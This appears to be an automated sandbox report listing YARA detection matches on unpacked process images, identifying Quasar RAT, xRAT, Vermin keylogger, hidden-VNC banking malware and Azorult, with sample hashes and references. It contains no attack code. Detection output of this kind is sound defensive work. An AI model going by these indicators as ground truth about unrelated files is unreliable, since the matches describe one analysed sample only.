Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_KeyLogger_1 date = 2018-02-08, hash1 = c492889e1d271a98e15264acbb21bfca9795466882520d55dc714c4899ed2fcf, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Vermin_Keylogger_Jan18_1 date = 2018-01-29, hash5 = 24956d8edcf2a1fd26805ec58cfd1ee7498e1a59af8cc2f4b832a7ab34948c18, hash4 = 4c5e019e0e55a3fe378aa339d52c235c06ecc5053625a5d54d65c4ae38c6e3da, hash3 = 0157b43eb3c20928b77f8700ad8eb279a0aa348921df074cd22ebaff01edaae6, hash2 = e1d917769267302d58a2fd00bc49d4aee5a472227a75f9366b46ce243e9cbef7, hash1 = 74ba162eef84bf13d1d79cb26192a4692c09fed57f321230ddb7668a88e3935d, author = Florian Roth, description = Detects Vermin Keylogger, hash6 = 2963c5eacaad13ace807edd634a4a5896cb5536f961f43afcf8c1f25c08a5eef, reference = https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: xRAT_1 date = 2017-12-11, hash2 = f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a, hash1 = 92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b, author = Florian Roth, description = Detects Patchwork malware, reference = https://goo.gl/Pg3P4W, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_banker_gen date = 2020-04-06, author = @VK_Intel, description = Detects malware banker hidden VNC, reference = https://twitter.com/VK_Intel/status/1247058432223477760
Source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_hvnc_zloader1_hvnc_generic date = 2020-03-21, author = @VK_Intel, description = Detects Zloader hidden VNC, reference = https://twitter.com/malwrhunterteam/status/1240664014121828352
